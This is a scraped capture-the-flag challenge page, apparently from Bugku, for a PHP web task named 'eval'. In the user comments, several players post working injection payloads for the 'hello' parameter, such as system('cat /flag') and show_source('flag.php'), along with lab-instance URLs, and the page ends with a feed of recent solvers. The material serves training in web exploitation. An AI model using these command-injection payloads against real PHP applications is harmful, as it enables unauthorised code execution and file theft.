evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 19505
提  示:
描  述:
eval
评论
我不打游戏的 4天前

想重练一下启动了没出现网站啊,搞诈骗啊???

回复 0

detian1234 8天前

网站直接运行你输入的内容,你输入指令让它打开存 flag 的文件,域名后面输入 /?hello=);show_source('flag.php');//

回复 0

kris6 10天前

?hello=eval(system(%27cat%20/flag%27))

回复 0

wyz 26天前

构造?hello=);system('cat flag.php');//,直接抓包,就找到flag

回复 0

b2026tf 28天前

http://171.80.2.169:17829/?hello=eval(system(%27cat%20/flag%27))

回复 0

syhaisy 1月前

GET /?hello=system('cat+flag.php') HTTP/1.1

回复 0

FTJJJ 1月前

?hello=eval(system('cat flag.php|grep {'))

回复 0

kitniu 2月前

file()是 " 的HTML 实体编码,是 PHP 内置的文件系统函数,核心功能是将整个文件按行读入一个字符串数组,每行(含换行符)为一个数组元素。 http://171.80.2.169:10115/?hello=file(%27flag.php%27)

回复 0

qth18700737704 2月前

?hello=eval(system(%27cat%20/flag%27))

回复 1

19153693078 2月前

根据代码php文件中包含flag.php 将传值hello得结果赋值给a,输出a得值,?hello=1 输出int 1,尝试将结果换成flag.php输出string(8) "flag.php",格式还是有问题的,考虑其是php文件,尝试?hello=file("flag.php"),得到文件中内容

回复 0

WriteUp

image
harry

1 金币

评分(10)

解题动态

曹达华 攻破了该题 17分钟前
3519894602 攻破了该题 1小时前
789879 攻破了该题 2小时前
秋明桑-蜀面豪杰 攻破了该题 2小时前
nmlgb 攻破了该题 2小时前
0.o、 攻破了该题 3小时前
nmmlgb 攻破了该题 3小时前
于书迟 攻破了该题 3小时前
admin76589 攻破了该题 3小时前
R1 攻破了该题 3小时前
lck17 攻破了该题 3小时前
Dylm 攻破了该题 3小时前
hzq 攻破了该题 3小时前
skkzz 攻破了该题 3小时前
haha9999 攻破了该题 3小时前
wzhkk 攻破了该题 3小时前
sfz 攻破了该题 3小时前
zigge 攻破了该题 3小时前
这里太热了 攻破了该题 3小时前
ppp_Bugku 攻破了该题 3小时前
问题反馈